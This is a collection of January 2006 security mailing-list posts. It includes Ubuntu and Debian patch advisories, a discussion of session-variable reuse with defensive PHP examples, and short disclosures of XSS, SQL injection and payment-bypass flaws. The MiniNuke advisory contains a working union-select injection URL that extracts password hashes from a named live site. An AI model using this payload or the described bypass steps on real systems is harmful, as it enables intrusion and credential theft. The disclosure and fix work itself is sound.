==========================================================
Ubuntu Security Notice USN-241-1 January 12, 2006
apache2, apache vulnerabilities
CVE-2005-3352, CVE-2005-3357
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)
The following packages are affected:
apache-common
apache2-common
apache2-mpm-worker
The problem can be corrected by upgrading the affected packages to
the following versions:
Ubuntu 4.10:
apache-common 1.3.31-6ubuntu0.9
apache2-common 2.0.50-12ubuntu4.10
apache2-mpm-worker 2.0.50-12ubuntu4.10
Ubuntu 5.04:
apache-common 1.3.33-4ubuntu2
apache2-common 2.0.53-5ubuntu5.5
apache2-mpm-worker 2.0.53-5ubuntu5.5
Ubuntu 5.10:
apache-common 1.3.33-8ubuntu1
apache2-common 2.0.54-5ubuntu4
apache2-mpm-worker 2.0.54-5ubuntu4
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
The "mod_imap" module (which provides support for image maps) did not
properly escape the "referer" URL, which rendered it vulnerable to
a cross-site scripting attack. A malicious web page (or HTML email)
could trick a user into visiting a site running the vulnerable mod_imap,
and employ cross-site-scripting techniques to gather sensitive user
information from that site. (CVE-2005-3352)
Hartmut Keil discovered a Denial of Service vulnerability in the SSL
module ("mod_ssl") that affects SSL-enabled virtual hosts with a
customized error page for error 400. By sending a specially crafted
request to the server, a remote attacker could crash the server. This
only affects Apache 2, and only if the "worker" implementation
(apache2-mpm-worker) is used. (CVE-2005-3357)
Updated packages for Ubuntu 4.10:
Updated packages for Ubuntu 5.04:
Updated packages for Ubuntu 5.10:
From - Thu Jan 12 15:43:07 2006
Message-ID: <43C63E74.1050906@scanit.be>
Date: Thu, 12 Jan 2006 11:33:08 +0000
From: Alla Bezroutchko <alla@scanit.be>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Session data pollution vulnerabilities in web applications
In web applications I've tested recently I have stumbled upon something
that seems to be a new class of bugs. Quick googling did not turn up any
reference to this kind of vulnerability, so I thought I should
describe it.
The problem boils down to the application reusing the same session
variable name in different application functions. In one function the
session variable is initialized from the user supplied data, and in
another function the value of the same session variable is used to
perform some sensitive action.
Here is an example. Suppose you have a web application that
requires authentication with login and password. New users can register
by filling in a form (let's say displayed by register1.php).
register2.php takes the form data, saves it in the session, checks it,
and if something is wrong with it, redirects back to register1.php with
an error message saying what needs to be corrected. Say the login name the
user has chosen is saved to the session like this:
$_SESSION['login'] = $_POST['login'];
Now, let's say another part of the application deals with forgotten
passwords. On page resetpw1.php the user enters his user name.
resetpw2.php looks up the secret question for that user in the database
and displays it. User enters the answer to the secret question.
resetpw3.php checks if the answer is correct, saves the user name in the
session ($_SESSION['login'] = $_POST['login'];) and asks the user to
enter the new password. The user enters the new password, and
resetpw4.php takes the user name from the session ($login =
$_SESSION['login']), takes the password from the form data, and updates
the password for that username in the database.
An attacker can first submit data to register2.php (setting the
$_SESSION['login'] to the value of his choice) and then submit data to
resetpw4.php that will take $_SESSION["login"] and change the password
for that account. resetpw4.php trusts the value in $_SESSION['login']
because it thinks that $_SESSION['login'] was created by resetpw3.php,
which verified it by means of secret question.
The problem stems from the fact that the same session variable is used by
different processes in the application to store both trusted and
untrusted data.
I have seen this kind of bug (not only related to logins and passwords,
but other things as well) in several different applications, written by
different development teams in Java and PHP. I suppose it is a rather
common problem. These bugs are easy to identify when the source code is
available - just grep for lines where the session variables are
initialized, check where the data comes from, and if it comes from the
user, check where else that session variable is used. They are a lot
more difficult to find with black-box testing of a web application,
though one can and does stumble upon them accidentally.
As for fixing those bugs, I suppose one approach is having a separate
session variable for each function in the application. For example new
user registration will keep its stuff in $_SESSION["register"]["login"]
and authentication will keep its stuff in $_SESSION["auth"]["login"]
Regards,
Alla Bezroutchko
Scanit
Subject: Re: [Full-disclosure] Session data pollution vulnerabilities in
web applications
From: Frank Knobbe <frank@knobbe.us>
To: Alla Bezroutchko <alla@scanit.be>
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Date: Thu, 12 Jan 2006 10:50:47 -0600
On Thu, 2006-01-12 at 11:33 +0000, Alla Bezroutchko wrote:
> As for fixing those bugs, I suppose one approach is having a separate
> session variable for each function in the application. For example new
> user registration will keep its stuff in $_SESSION["register"]["login"]
> and authentication will keep its stuff in $_SESSION["auth"]["login"]
These types of bugs stem from bad program design. (BTW: I wouldn't call
it session data pollution... you're not polluting anything).
The proposed fix is -- besides being only specific to this example --
equally flawed. The underlying issue is that you trust user supplied
data. When a user supplies a user name for login purposes, you should
only use that input to perform a search in your database. If a match has
been found, take a *trusted* value from your database, for example an
index ID, and carry that in the session object to identify the user.
In other words, don't accept any user input (even after proper input
validation) and carry it as trusted data in your session object. Don't
base further decisions on this data. Since it is user supplied it can
not be trusted.
Your example is further flawed in that it allows the change of a
password without being properly authenticated. Just having a valid
'login' session object present doesn't indicate that the user is
authenticated. I really, really hope this was just an example you made
up, and not something you actually saw being used. If so, go back to
that web site with a clue-by-four and give it a few whacks.
But you are right that these types of issues are common. While we're
educating developers on secure program design, I think we need to do a
better job at teaching some paranoia too. Every programmer should have a
healthy dose of paranoia and distrust when writing applications :)
Cheers,
Frank
--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
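The flow discussed in the two messages above, as an added example that is not code from either post: the shared-key logic from the original description beside a version that gives each workflow its own session key and stores only a database-derived id once the secret answer has been checked. The function names, the `register` and `reset` session keys and the in-memory user table are assumptions made for illustration.

```php
<?php
// Added illustration, not code from the thread. Function names, the 'register'
// and 'reset' session keys and the in-memory user table are assumptions.
// $session stands in for $_SESSION and $post for $_POST so this runs from the CLI.

// Constructed sample accounts: login => database id, secret-answer hash, password hash.
function sample_users(): array {
    return [
        'alice' => ['id' => 101, 'answer' => password_hash('blue', PASSWORD_DEFAULT),
                    'pw' => password_hash('alice-old', PASSWORD_DEFAULT)],
        'bob'   => ['id' => 102, 'answer' => password_hash('rex', PASSWORD_DEFAULT),
                    'pw' => password_hash('bob-old', PASSWORD_DEFAULT)],
    ];
}

// ---- Flow as described in the post: one key, two writers -------------------
function register2_shared(array &$session, array $post): void {
    $session['login'] = $post['login'];            // unverified form data
}

function resetpw3_shared(array &$session, array $post, array $users): bool {
    $user = $users[$post['login']] ?? null;
    if ($user === null || !password_verify($post['answer'], $user['answer'])) {
        return false;
    }
    $session['login'] = $post['login'];            // verified, but same key
    return true;
}

function resetpw4_shared(array &$session, array $post, array &$users): bool {
    $login = $session['login'] ?? null;            // the writer is unknown here
    if (!is_string($login) || !isset($users[$login])) {
        return false;
    }
    $users[$login]['pw'] = password_hash($post['password'], PASSWORD_DEFAULT);
    return true;
}

// ---- Hardened flow ----------------------------------------------------------
function register2_scoped(array &$session, array $post): void {
    // Kept only to redisplay the form; no other workflow reads this key.
    $session['register'] = ['login' => (string) ($post['login'] ?? '')];
}

function resetpw3_scoped(array &$session, array $post, array $users): bool {
    unset($session['reset']);                      // drop any earlier attempt
    $user = $users[(string) ($post['login'] ?? '')] ?? null;
    if ($user === null
        || !password_verify((string) ($post['answer'] ?? ''), $user['answer'])) {
        return false;
    }
    // Store the id read from the database, not the submitted login name.
    $session['reset'] = ['user_id' => $user['id'], 'verified_at' => time()];
    return true;
}

function resetpw4_scoped(array &$session, array $post, array &$users, int $ttl = 600): bool {
    $state = $session['reset'] ?? null;
    unset($session['reset']);                      // single use
    if (!is_array($state) || !isset($state['user_id'], $state['verified_at'])
        || time() - $state['verified_at'] > $ttl) {
        return false;
    }
    foreach ($users as $login => $user) {
        if ($user['id'] === $state['user_id']) {
            $users[$login]['pw'] = password_hash($post['password'], PASSWORD_DEFAULT);
            return true;
        }
    }
    return false;
}

// ---- The request sequence from the post, run against both flows ------------
$users = sample_users();
$session = [];
register2_shared($session, ['login' => 'alice']);
$ok = resetpw4_shared($session, ['password' => 'set-by-caller'], $users);
printf("shared key, resetpw4 without resetpw3: %s\n", $ok ? 'password changed' : 'refused');

$users = sample_users();
$session = [];
register2_scoped($session, ['login' => 'alice']);
$ok = resetpw4_scoped($session, ['password' => 'set-by-caller'], $users);
printf("scoped keys, resetpw4 without resetpw3: %s\n", $ok ? 'password changed' : 'refused');

$ok = resetpw3_scoped($session, ['login' => 'alice', 'answer' => 'blue'], $users)
    && resetpw4_scoped($session, ['password' => 'alice-new'], $users);
printf("scoped keys, full reset with correct answer: %s\n", $ok ? 'password changed' : 'refused');
```

In a web request the same functions would be called with `$_SESSION` and `$_POST` in place of the local arrays.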
Date: Thu, 12 Jan 2006 22:22:17 -0600
From: nukedx@nukedx.com
To: submit@milw0rm.com, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com, orhankara@soulshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection
vulnerability
--Security Report--
Advisory: XSS attack on Superonline.com email service.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:47 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About: Via this method a remote attacker can inject an SQL query into news.asp
---
How&Example: GET ->
http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hidf%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_idR
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Thanks to ajan;)
Regards,
From the NWPX team,
nuker a.k.a nukedx
From: "M.Neset KABAKLI" <neset@wakiza.com>
To: <bugtraq@securityfocus.com>
Subject: FogBugz Cross Site Scripting Vulnerability
Date: Thu, 12 Jan 2006 13:15:03 +0200
I.Vulnerability
FogBugz Cross Site Scripting Vulnerability
II.Vendor
Fog Creek Software (www.fogcreek.com)
III.Affected Systems
- FogBugz (<= 4.029)
IV.About
FogBugz is a complete web based project management system for software
teams. Designed by Joel Spolsky of Joel on Software fame (www.fogcreek.com).
V.Description
An attacker is able to inject HTML and client-side script code into the
FogBugz login page by modifying the dest variable. An example crafted link
can be found below.
VI.Exploit
http://[fogbugz.example.com]/default.asp?pg=pgLogon&dest=[XSS]
VII.Vulnerability Status
- Vulnerability discovered on 2005-12-11.
- Vendor notified on 2005-12-13.
- Patch released on 2005-12-13.
VIII.Credits
M.Neset KABAKLI, Wakiza Software Technologies (www.wakiza.com).
Date: Thu, 12 Jan 2006 07:14:42 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: bugtraq@securityfocus.com
Subject: Cisco, haven't we learned anything? (technician reset)
In this (http://www.cisco.com/warp/public/707/cisco-sa-20060111-mars.shtml)
recent Cisco advisory, the company alerts us to a security problem
with Cisco MARS (Cisco Security Monitoring Analysis and Response System).
The security issue is basically a user account on the system that will
give you root when accessed.
The account is:
1. Hidden.
2. Default.
3. With a pre-set password.
In other words, this is a journey back 10 years when technicians would
commonly have special keys (actual keys, electronics or passwords) to
access a device if they have to troubleshoot it for anything, or say... the
user lost his password.
People used to trade these keys online and hidden accounts were a thing of
common practice. Today people still trade commonly used default passwords
but it is not as popular as it used to be, at least in the online world.
On the other hand, the most common practice to hack routers today, is
still to try and access the devices with the notoriously famous default
login/password for Cisco devices: cisco/cisco.
Cisco/cisco is the single most used default password of our time. It got
more routers pwned than any exploit in history, and it still does. One
would think that a company such as Cisco, especially with this history,
would stay away from such "default" accounts... but the fact that this
account is hidden makes it something different.
It makes it a backdoor. One much like those used by the Bad Guys.
Now... if Cisco knowingly put it there, shame on them. If somebody put it
there without their knowledge... well, shame on them.
This is indeed a vulnerability, as in a weakness. It is not however a
software coding bug that may result in say... a buffer overflow. It is a
part of the design of the system.
Cisco disclosing this is very nice and commendable, but perhaps they
should also let us know whether this was indeed a backdoor somebody put in
their system or if it was part of the design?
I love eastereggs. I just don't like surprises in system privileges or
backdoors, especially not in a security monitoring and response product.
I very much doubt it was anything else but a part of the design but that
should be admitted to.
As the advisory states:
"No other Cisco products are currently known to be affected by this
vulnerability."
Okay, but how about other vulnerabilities of this type? Are there any more
backdoors to other Cisco products?
If not, why wouldn't they just come out and say that?
"There are NO other such backdoors in our products".
I'd even be happy with:
"To our knowledge, there are no other vulnerabilities of this type in our
products."
This is not a bug. One can never be sure ALL bugs are eliminated - however
hard one may try.
One CAN admit to having no such features in other products, though.
Once again we fall upon re-naming of a feature as a bug or a bug as a
feature to make the problem sound less severe.
In this case, the judgement is plain and simple:
If Cisco were Bad Guys, this is a backdoor.
As Cisco are Good Guys, this is a technician reset.
Terminology? What's the difference?
The difference is that Cisco are not Bad Guys. If they disclose a
problem they should do it fully, because as a client, I am now concerned.
This reminds me of Ciscogate but not for obvious reasons. That was a bad
event for everybody involved.
It reminds me of the very issue Mike Lynn discussed:
Remote exploitation for Cisco is possible, while so far Cisco disclosed
all these problems as DoS vulnerabilities.
I am not saying Cisco did that on purpose, but in THIS case they CAN set
my mind at ease.
Why don't they?
Gadi.
From: "M.Neset KABAKLI" <neset@wakiza.com>
To: <bugtraq@securityfocus.com>
Subject: Interspire TrackPoint NX XSS Vulnerability
Date: Thu, 12 Jan 2006 13:13:01 +0200
I.Vulnerability
Interspire TrackPoint NX Cross Site Scripting Vulnerability
II.Vendor
Interspire (www.interspire.com)
III.Affected Systems
- Interspire TrackPoint NX (< 0.1)
IV.About
TrackPoint is a web based sales tracking software.
V.Description
An attacker is able to inject HTML and client-side script code into the
TrackPoint NX login page by modifying the username variable. An example is
provided below.
VI.Exploit
http://[www.example.com]/[tpointdir]/index.php?Page=login&Action=Login&username=[XSS]
VII.Vulnerability Status
- Vulnerability discovered on 2005-11-13.
- Vendor notified on 2005-12-09.
- Patch released on 2005-12-12
(http://www.interspire.com/forum/showthread.php?p)606).
VIII.Credits
M.Neset KABAKLI, Wakiza Software Technologies (www.wakiza.com).
From: "uinC Team" <vuln@uinc.ru>
To: <bugtraq@securityfocus.com>
Subject: Multiple PHP Toolkit for PayPal Vulnerabilities
Date: Thu, 12 Jan 2006 17:42:04 +0300
Vendor: Patrick Breitenbach and Dave Nielsen [http://paypal.sf.net/]
Versions affected: PHP Toolkit for PayPal v0.50 (and may be prior)
Date: 12th January 2006
Type of Vulnerability: Sensitive Information Disclosure and Payment System
Bypass
Severity: Critical
Solution Status: Unpatched
Vendor was notified on 9th January 2006 without answer
Discovered by: .cens, uinC Team
Online location: http://www.uinc.ru/articles/vuln/ptpaypal050.shtml
Background:
From vendor web-site:
"The PHP Toolkit provides a set of scripts that facilitate the integration
of PayPal into an ecommerce service. It provides scripts that generate a
PayPal form dynamically as well as scripts to process Instant Payment
Notifications."
Description:
1) Payment System Bypass
If the payment through PayPal.com was completed successfully, payment data
is transferred to ipn.php, which in turn executes ipn_success.php, passing
it the parsed payment data as parameters using POST request. ipn_success.php
will enter the passed data straight into log file without verifying where
this data came from. This means, an attacker can reproduce the POST request
and enter the details of the successful payment into the log file even if
there was no payment through PayPal.com
2) Sensitive Information Disclosure
PHP Toolkit for PayPal vendor documentation recommends to set permissions
for the "logs" directory "../ipn/logs/" to 777. Data from ipn_success.php
suggests that the payment data log file is "logs/ipn_success.txt", which, if
installed according to documentation, will have global read permission. As a
result, anyone is able to view the transaction data.
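One possible mitigation for both findings above, as an added example that is not code from PHP Toolkit for PayPal: the success handler accepts a POST only if it carries an HMAC computed by the script that validated the notification, and the log is written to a directory and file readable only by the web server account. The function names, the `mac` field, the shared secret and the log location are assumptions; the payment fields are constructed sample values.

```php
<?php
// Added illustration, not code from PHP Toolkit for PayPal. Function names,
// the 'mac' field, the shared secret and the log location are assumptions.

// Serialise the fields the same way on both sides so both sign the same bytes.
function canonical_fields(array $fields): string {
    ksort($fields, SORT_STRING);
    return http_build_query($fields, '', '&', PHP_QUERY_RFC3986);
}

// Sender side: run only after the notification has been validated with PayPal.
function sign_fields(array $fields, string $secret): string {
    return hash_hmac('sha256', canonical_fields($fields), $secret);
}

// Receiver side: returns the payment fields, or null if the POST was not
// produced by a holder of the secret.
function accept_success_post(array $post, string $secret): ?array {
    $mac = $post['mac'] ?? null;
    unset($post['mac']);
    if (!is_string($mac) || !hash_equals(sign_fields($post, $secret), $mac)) {
        return null;
    }
    return $post;
}

// Append one record to a log that only the web server account can read.
function append_payment_log(string $dir, array $fields): string {
    if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
        throw new RuntimeException("cannot create $dir");
    }
    chmod($dir, 0700);                       // not 777
    $file = $dir . '/ipn_success.txt';
    $previous = umask(0077);                 // a new file is created as 0600
    // json_encode escapes newlines, so a field cannot forge extra log lines.
    $written = file_put_contents($file, date('c') . ' ' . json_encode($fields) . "\n",
                                 FILE_APPEND | LOCK_EX);
    umask($previous);
    if ($written === false) {
        throw new RuntimeException("cannot write $file");
    }
    chmod($file, 0600);                      // also tightens a pre-existing file
    return $file;
}

// ---- Demo with constructed values ------------------------------------------
$secret = random_bytes(32);  // in deployment: a fixed value stored outside the web root
$logDir = sys_get_temp_dir() . '/ipn-demo-' . bin2hex(random_bytes(4));  // stand-in path

$payment = ['txn_id' => 'CONSTRUCTED-0001', 'payment_status' => 'Completed',
            'mc_gross' => '19.95', 'payer_email' => 'buyer@example.com'];

// 1. A POST sent straight to the success handler, without a valid MAC.
$direct = accept_success_post($payment + ['mac' => str_repeat('0', 64)], $secret);
echo 'POST without valid MAC: ', $direct === null ? "rejected\n" : "logged\n";

// 2. The same fields forwarded by the validating script.
$forwarded = accept_success_post($payment + ['mac' => sign_fields($payment, $secret)], $secret);
if ($forwarded !== null) {
    $file = append_payment_log($logDir, $forwarded);
    printf("signed POST: logged to %s, mode %s\n",
           $file, substr(sprintf('%o', fileperms($file)), -4));
}
```

Calling the success handler in-process instead of over HTTP removes the need for the MAC altogether; the log directory belongs outside the document root in either case.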
Date: Thu, 12 Jan 2006 12:32:22 +0100 (CET)
From: joey@infodrom.org (Martin Schulze)
Subject: [SECURITY] [DSA 937-1] New tetex-bin packages fix arbitrary code execution
To: bugtraq@securityfocus.com
--------------------------------------------------------------------------
Debian Security Advisory DSA 937-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
January 12th, 2006                      http://www.debian.org/security/faq
--------------------------------------------------------------------------
Package : tetex-bin
Vulnerability : buffer overflows
Problem type : remote
Debian-specific: no
CVE IDs : CVE-2005-3191 CVE-2005-3192 CVE-2005-3624 CVE-2005-3625
CVE-2005-3626 CVE-2005-3627 CVE-2005-3628
CERT advisory :
BugTraq ID :
Debian Bug : 342292
"infamous41md" and Chris Evans discovered several heap based buffer
overflows in xpdf, the Portable Document Format (PDF) suite, which is
also present in tetex-bin, the binary files of teTeX, and which can
lead to a denial of service by crashing the application or possibly to
the execution of arbitrary code.
For the old stable distribution (woody) these problems have been fixed in
version 1.0.7+20011202-7.7.
For the stable distribution (sarge) these problems have been fixed in
version 2.0.2-30sarge4.
For the unstable distribution (sid) these problems have been fixed in
version 0.4.3-2 of poppler against which tetex-bin links.
We recommend that you upgrade your tetex-bin package.
Upgrade Instructions
--------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Size/MD5 checksum: 66218 d349881df541b5f7383e5a5390ac238a
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_i386.deb
Size/MD5 checksum: 59176 81412a2ee64924929205b718813970bb
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_i386.deb
Size/MD5 checksum: 3939522 fe9e13180506bb76b073be1e289d214e
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_ia64.deb
Size/MD5 checksum: 89822 abc527d1eccb607d0731be6200352e75
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_ia64.deb
Size/MD5 checksum: 73492 b7ba1d9e84583256f33a1c5abe76162e
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_ia64.deb
Size/MD5 checksum: 5909228 984e273287f9d5dbee2e8310ab43ae69
HP Precision architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_hppa.deb
Size/MD5 checksum: 78310 0e86d99930bf65fdc9c3479089a6a20b
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_hppa.deb
Size/MD5 checksum: 66644 21cab5ff1f28857f08b1771de7c3f461
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_hppa.deb
Size/MD5 checksum: 4612710 fdab445f3c33ae90180d3c834044fc40
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_m68k.deb
Size/MD5 checksum: 63502 78c53919dcfe97aedbc80b1fc887e204
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_m68k.deb
Size/MD5 checksum: 58736 69a55de426d9e122adc441b26c9bb062
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_m68k.deb
Size/MD5 checksum: 3600916 b05f9a5118f7028e5c437c5749bfe79f
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_mips.deb
Size/MD5 checksum: 75558 6449710e39b1ebad2c982bcad599e7f0
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_mips.deb
Size/MD5 checksum: 59190 d1fa5b3b77fd4a24d1bc65fb5bce6a90
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_mips.deb
Size/MD5 checksum: 4602728 8454c9ddb3922c981e8d5cc5bf59ad1e
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_mipsel.deb
Size/MD5 checksum: 75546 7bbac980fa4a95d71ebd4de2fe2b2b5b
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_mipsel.deb
Size/MD5 checksum: 59430 ea2fd76fbc73cad63efef3b939c89aa1
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_mipsel.deb
Size/MD5 checksum: 4559108 fc52f040b130e7954230cffdd91d1145
PowerPC architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_powerpc.deb
Size/MD5 checksum: 74904 8a3d0d1292f0978eab3b39d6f96a97e9
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_powerpc.deb
Size/MD5 checksum: 63372 09c6961bbf8e5280ab1f618dd443106c
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_powerpc.deb
Size/MD5 checksum: 4382198 62e8dec6600f7fdcee4e11bc29258766
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_s390.deb
Size/MD5 checksum: 71844 48a4bded5ebdb5719f5b72fc0bb4ea60
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_s390.deb
Size/MD5 checksum: 63614 9fdebe54556dba9bb6fd3cdd5bab2034
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_s390.deb
Size/MD5 checksum: 4269024 36f0cf0d6f8f73f569af231b7b47c53e
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_sparc.deb
Size/MD5 checksum: 70022 7cfdf14b376e0249ae24bb77fb1ae73a
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_sparc.deb
Size/MD5 checksum: 60990 f25104fe0c734c162f75876bdaf797aa
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_sparc.deb
Size/MD5 checksum: 4156948 a5ae0e1018b2ddc41de89accf9aa10d6
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDxj5FW5ql+IAeqTIRAiSvAJ4nLrbz5mX/YGj988kKJvTyxWjPUACdHocZ
DXgbf2rREWYvVX/u3V1/tEg=SKyV
-----END PGP SIGNATURE-----
From - Thu Jan 12 18:23:07 2006
Message-Id: <m1Ex0Cp-000ojnC@finlandia.Infodrom.North.DE>
Date: Thu, 12 Jan 2006 12:01:23 +0100 (CET)
From: joey@infodrom.org (Martin Schulze)
Subject: [SECURITY] [DSA 903-2] New unzip packages fix unauthorised permissions modification
To: bugtraq@securityfocus.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 903-2 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 12th, 2006
http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : unzip
Vulnerability : race condition
Problem type : local
Debian-specific: no
CVE ID : CAN-2005-2475
BugTraq ID : 14450
Debian Bugs : 321927 343680
The unzip update in DSA 903 contained a regression so that symbolic
links that are resolved later in a zip archive aren't supported
anymore. This update corrects this behaviour. For completeness,
below please find the original advisory text:
Imran Ghory discovered a race condition in the permissions setting
code in unzip. When decompressing a file in a directory an
attacker has access to, unzip could be tricked to set the file
permissions to a different file the user has permissions to.
For the old stable distribution (woody) this problem has been fixed in
version 5.50-1woody5.
For the stable distribution (sarge) this problem has been fixed in
version 5.52-1sarge3.
For the unstable distribution (sid) this problem has been fixed in
version 5.52-6.
We recommend that you upgrade your unzip package.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5.dsc
Size/MD5 checksum: 571 75e2923b74af607785cbefbbea79d1ab
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5.diff.gz
Size/MD5 checksum: 6484 73efae47dcd377abb934e36805c16190
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50.orig.tar.gz
Size/MD5 checksum: 1068379 6d27bcdf9b51d0ad0f78161d0f99582e
Alpha architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_alpha.deb
Size/MD5 checksum: 160482 94b0a5e18d78866d92f375d6b93a22c3
ARM architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_arm.deb
Size/MD5 checksum: 139374 bd8cc4c654c901b5c320b2cdbf09f31b
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_i386.deb
Size/MD5 checksum: 122808 1d5669290431fb7fe83f688447b22d84
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_ia64.deb
Size/MD5 checksum: 191010 1cd02c151f46b5f7872a7de3079ebc2a
HP Precision architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_hppa.deb
Size/MD5 checksum: 146954 ee23ad6e2c40d38e4655be1f2666489d
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_m68k.deb
Size/MD5 checksum: 119578 7765363163750bed7e72472bee09afc4
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_mips.deb
Size/MD5 checksum: 142950 97af77c03fb69936407c86394fb846a5
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_mipsel.deb
Size/MD5 checksum: 143422 98a0ab0fd751c246ebd50e5c62886217
PowerPC architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_powerpc.deb
Size/MD5 checksum: 136368 b2bea065ae91032fe987aaf120e08ad9
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_s390.deb
Size/MD5 checksum: 137044 151da2fddaaca890dbf5166140f23881
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_sparc.deb
Size/MD5 checksum: 147498 022e8ca1cecf20178edd68296fd973aa
Debian GNU/Linux 3.1 alias sarge
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3.dsc
Size/MD5 checksum: 528 b6e01dbb89f9130fa16650b16f4d4e32
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3.diff.gz
Size/MD5 checksum: 5387 807b5d9e8efa85e8caab673eff38aff7
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52.orig.tar.gz
Size/MD5 checksum: 1140291 9d23919999d6eac9217d1f41472034a9
